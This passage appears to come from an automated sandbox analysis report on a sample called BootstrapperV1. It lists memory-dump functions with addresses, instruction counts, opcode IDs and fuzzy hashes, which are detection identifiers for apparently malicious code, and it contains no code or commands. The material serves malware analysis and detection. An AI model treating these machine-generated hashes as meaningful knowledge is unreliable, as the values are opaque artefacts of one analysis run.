                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D41FF61B0CE4A1FEBF8EA2C95A4A7077D2EFA821134845FAD54DC72A3DD18EC41C380
                                                                                                                                                                                                                                              Function 00007FFB4B0F63F3 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 38ea93b209d264542a5b0ef15cef790950dcd4c754bbbac6dd8e5ff57d5f07c5
                                                                                                                                                                                                                                              • Instruction ID: ab4c423449f2e461c8c40dc88de106b5953faab1d26093323fb01aa011f474bb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38ea93b209d264542a5b0ef15cef790950dcd4c754bbbac6dd8e5ff57d5f07c5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96410871A0D7895FDB569B38C8156A53FF1EF5B221F0942EBD089C72B3DA58AC02C391
                                                                                                                                                                                                                                              Function 00007FFB4B0E412D Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 77559f257f3a2b28ac3ebe66584ce56cc5655061af297cc63578b34fcbc3f8d6
                                                                                                                                                                                                                                              • Instruction ID: 73a311a3a25e4f20bf05c3a610f48db64b18866c0032e411b50f340d2cf2486f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77559f257f3a2b28ac3ebe66584ce56cc5655061af297cc63578b34fcbc3f8d6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A4159A2A0D7965FEB527E7CE4965FC3BA0DF52326B0842F7D18CC62A3DD1858068391
                                                                                                                                                                                                                                              Function 00007FFB4B0E7B25 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 313cecf548592c4f6ffbeffc37c9ad4b76fcb50ba90631474c1bfe1d8ab20a0d
                                                                                                                                                                                                                                              • Instruction ID: a42d1cc1bd4ef35b5916343c49b0a30bd06410a1901b1272a9b5db306f64e116
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 313cecf548592c4f6ffbeffc37c9ad4b76fcb50ba90631474c1bfe1d8ab20a0d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46413372A0DA8E5FDB45EF3CC8546E97BE0EF65316F0441BFD149C32A2DA289845C790
                                                                                                                                                                                                                                              Function 00007FFB4B0F5490 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 39ef8a39349c0c7755670034d6ceb5f6c391baec864be9d8a96cd9ad71373701
                                                                                                                                                                                                                                              • Instruction ID: 7f0eb919fb64002e8f35ec0360848b9bf83f0c64637a2abf6b944c2154a16439
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39ef8a39349c0c7755670034d6ceb5f6c391baec864be9d8a96cd9ad71373701
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8041E170A1CE064FE758EA38D495AA9B7D2FF84301F04857DD58AC32A5DE29F842C780
                                                                                                                                                                                                                                              Function 00007FFB4B0E8168 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 542d07fe7933d900dd86b909a80b93b556633aaa83e8152f308f53b0ab6e1769
                                                                                                                                                                                                                                              • Instruction ID: ba55234b0759b2cca7668dff08bd3cc04ad1d459e5648b03da17bf63dc4863e4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 542d07fe7933d900dd86b909a80b93b556633aaa83e8152f308f53b0ab6e1769
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53312C72A1C94A4FF794AE3CD8993B937D0EB98311F0445BFE84DC73A1EE1899864781
                                                                                                                                                                                                                                              Function 00007FFB4B0E6700 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 41280a6bb45588fede8b6ca4236c822a6f4a8fb6d68ef1642c9d562810d3d298
                                                                                                                                                                                                                                              • Instruction ID: 5dfaecec6942e5b69dc2fa8bdb0a10121724081afb6744b3827ef81576a82641
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41280a6bb45588fede8b6ca4236c822a6f4a8fb6d68ef1642c9d562810d3d298
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F41069290D6CA6FE742BBB8A8665E97FB0DF03255F0842FAD4CD8B193DC0824468756
                                                                                                                                                                                                                                              Function 00007FFB4B0F70C8 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: eb914407a66afee486787d3dfdc7ed5b100fd0e34cd4c3c41835aef784608014
                                                                                                                                                                                                                                              • Instruction ID: dc509c006dd581b9c55b6f7a6b32c271ebce4764dec024a4f7ec1b7c0441522a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb914407a66afee486787d3dfdc7ed5b100fd0e34cd4c3c41835aef784608014
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F341DF7071CA458FD759EF38C594AB977E1FF49301F1480BDD18AC72A2CE69B8468742
                                                                                                                                                                                                                                              Function 00007FFB4B0F4201 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 44a875bee678f4dfe32f37a48d2d628aa9d410e42e33b5b479a6f87cc01a0ef0
                                                                                                                                                                                                                                              • Instruction ID: 35d2b1951f99dcadf17f39e63bb302b9de7624a388ece533dee9c9988af5cbae
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44a875bee678f4dfe32f37a48d2d628aa9d410e42e33b5b479a6f87cc01a0ef0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A31F192B0DAC50FE3D5EBBC68A55A87FC1EF9A11574940FAD988C72B3D8445806C381
                                                                                                                                                                                                                                              Function 00007FFB4B0EED98 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6fb13f9eb0cd7541eccd5fd902ca2ded2abf65b111092ccb00d59a63f7063079
                                                                                                                                                                                                                                              • Instruction ID: 4dfbf4382fb6c6d0053cb286c7772690c92ae7e6c1df292f8616fdc7a3c9b696
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fb13f9eb0cd7541eccd5fd902ca2ded2abf65b111092ccb00d59a63f7063079
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A931D160B1D94D0FEAD9EA3CD459675BBC2EF98311B1405BED48EC33A7DD18AC428740
                                                                                                                                                                                                                                              Function 00007FFB4B0E7EE1 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 93b030ff01ebec272a4ed5ae76d3753f79a62fd56f1388e5e68c0472578d97fe
                                                                                                                                                                                                                                              • Instruction ID: 93ee8f44ced5253294761bc70a10b904a5de8c581903b12eee9dab0a650e8ecb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93b030ff01ebec272a4ed5ae76d3753f79a62fd56f1388e5e68c0472578d97fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6313966A0E7954FD3136B3CE8E64E53BB0DF4322671942FBD089CE1A3DC09884B8356
                                                                                                                                                                                                                                              Function 00007FFB4B0E7A90 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1cd23a8ec65d53832b995a8817abb87a289f7b884655ee475b5a5ba59a4fe234
                                                                                                                                                                                                                                              • Instruction ID: 7d80aa78898aa205d04d10022a8ed12073f4d96b6c150050bcf604650ed90555
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cd23a8ec65d53832b995a8817abb87a289f7b884655ee475b5a5ba59a4fe234
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 373107A170C9895FEB90FB3CD5596B47BE1FF5931670800FAD48CC7267D9159C428340
                                                                                                                                                                                                                                              Function 00007FFB4B0E114D Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c7b4c2f230dfdbc49c52636aa83846c815b70af9fbd40fbbea918b8ee10a1228
                                                                                                                                                                                                                                              • Instruction ID: e47e61f28d051484335b842cee95b90ded00a42a3eca27fa97b2d542979273e6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7b4c2f230dfdbc49c52636aa83846c815b70af9fbd40fbbea918b8ee10a1228
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E741129048F7C22FD79397B899655923FF99E87120B0E81EBD5C8CE0A7D54E085AC322
                                                                                                                                                                                                                                              Function 00007FFB4B0EB8CD Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fb85350fd9e27d12814f9fb13cf33b1d2b7908067d72c3a09280c22f77805c07
                                                                                                                                                                                                                                              • Instruction ID: 970ce0ef45247437e58f51691be3e737757bbb94b87ebb14d586e79f439f2138
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb85350fd9e27d12814f9fb13cf33b1d2b7908067d72c3a09280c22f77805c07
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B3124A1A0E6C52FE717E77899A65B57FE1EF57200B0844FED4C9CB1A3EC0858428351
                                                                                                                                                                                                                                              Function 00007FFB4B0E48D5 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: efbc9925c724591282adb46826623ff679af0e589df0d637e74b02db1b433918
                                                                                                                                                                                                                                              • Instruction ID: 09b0e12196c1c83bc79d18bf8c125fbda3bebb04372836723a2472af024c1a74
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efbc9925c724591282adb46826623ff679af0e589df0d637e74b02db1b433918
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37317E7071CA098BD768EE2CC584AB973E1FB98302F64857DD55FC33A1CE65B8468781
                                                                                                                                                                                                                                              Function 00007FFB4B0EC22D Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3df4796f17a67b4a1b8ca5b89423c44cbe43d27f3b4fb5a4d275cff605ca65ac
                                                                                                                                                                                                                                              • Instruction ID: 0f3500f596b283bc2f60c52377406bbf8e0706c2f0b4b749e798e6072d662c8f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3df4796f17a67b4a1b8ca5b89423c44cbe43d27f3b4fb5a4d275cff605ca65ac
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6731D4A160C9C95FEB91FB3C95596643BE2FF5D356B0900FAD48CC72A3D9199C028340
                                                                                                                                                                                                                                              Function 00007FFB4B0ED940 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 77cb8c3ed181367ab8c02f3fc44163f5245be4a6eaf0978e260595a02499a0b8
                                                                                                                                                                                                                                              • Instruction ID: fd8a1bfed5e864d6fb74ff204ca585d3ca62fa3a27c8557643036ebf3c9f3861
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77cb8c3ed181367ab8c02f3fc44163f5245be4a6eaf0978e260595a02499a0b8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4441F36160EBC98FC756EF38C8A49A1BFE0EF5621530982EAD089CF1B3D915E806C710
                                                                                                                                                                                                                                              Function 00007FFB4B0E3B49 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f1f659595460ba86be8dc1a6bc846991faa5147837a1938cbc0a60392457fd60
                                                                                                                                                                                                                                              • Instruction ID: 665147cb3a4509e363180a6b62eb89c8f3f103a43333aa0aefd47d8cc3f9c971
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1f659595460ba86be8dc1a6bc846991faa5147837a1938cbc0a60392457fd60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9931927188D6912FE3179B34AC579F27FA4DB42326B1941E7D14DCB6A3C90E2583C3A2
                                                                                                                                                                                                                                              Function 00007FFB4B0FF021 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f167ff728553c775836d1fc2ac7e3713c908d2e1255aed79fa97a49f55b503e4
                                                                                                                                                                                                                                              • Instruction ID: 654041a97f5c9fe6f471d57e11302d6302b2d9a368b099537d8c9dc78792d893
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f167ff728553c775836d1fc2ac7e3713c908d2e1255aed79fa97a49f55b503e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA313AA1B0D9895FEB51EB7CC0517E9BBE1FF95301F0841F6D049C32E2DE68A8468382
                                                                                                                                                                                                                                              Function 00007FFB4B0E794F Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b3d675512210cf9b43d9dd9553322b9fa78327fb264713072d780d024b8f7eb5
                                                                                                                                                                                                                                              • Instruction ID: 6131aa8aa7193d6f94fa1749ade2351386cdd07a66c1da3151e9dea1a33af818
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3d675512210cf9b43d9dd9553322b9fa78327fb264713072d780d024b8f7eb5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B3121A2A0D84D2FDB99EF7CD8582F97BD0EF89241B0444FAE58DC72A6DD1858468780
                                                                                                                                                                                                                                              Function 00007FFB4B0FF165 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bfcecde9f291a5736e06f9543ea919bde7ffdd78afe67bcdfd6700614f5acfef
                                                                                                                                                                                                                                              • Instruction ID: de91b968232d3a196e6a4fc27e7d4260e2beb49c983702ad9888a5d31e4c923c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfcecde9f291a5736e06f9543ea919bde7ffdd78afe67bcdfd6700614f5acfef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 333137A1A4E6C91FE752FB78A8565EDBFE0DF4A311B0841EBD0C9CB2A3D9181941C352
                                                                                                                                                                                                                                              Function 00007FFB4B0E49D3 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 13393b98e34daacc18c28f806ab149f3042a9fa0e9a12b14e4b920c13144a1d4
                                                                                                                                                                                                                                              • Instruction ID: c7bd31303801211f82d2f234fc7e9f68be6454f56565bb711f2c19cffc2a8805
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13393b98e34daacc18c28f806ab149f3042a9fa0e9a12b14e4b920c13144a1d4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4731AD72A1892C5FDB94EB6CD4896AC77D1EB99312F0881BAE10DD72A5CE209C058381
                                                                                                                                                                                                                                              Function 00007FFB4B0E5670 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e447a76deb32769f525d0796488b93a996046df9e10f62d8d5e88a79cdcb616b
                                                                                                                                                                                                                                              • Instruction ID: d8dab2c51d3ce8f6b6c06686c0d359d292d142232884eb24a5c2e294ff397a44
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e447a76deb32769f525d0796488b93a996046df9e10f62d8d5e88a79cdcb616b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85213B52A1EE8E4FD742BB7CF4542E677A1EF8222670842F7D089C6157DC08D4468394
                                                                                                                                                                                                                                              Function 00007FFB4B0F6781 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c5d2e76a0ca06a5303ac345d110ef1d62101894fc490879cc1040f0cd8ee4ea6
                                                                                                                                                                                                                                              • Instruction ID: 804cbabb4de2d5dcf3d4926a33e70002df0bd0ec33e9b2b01e715c7b84083873
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5d2e76a0ca06a5303ac345d110ef1d62101894fc490879cc1040f0cd8ee4ea6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16215C70B0CA0C4FEB88EE1CD4556B977E1EB9C311F44427ED14ED32A5CA69A805C685
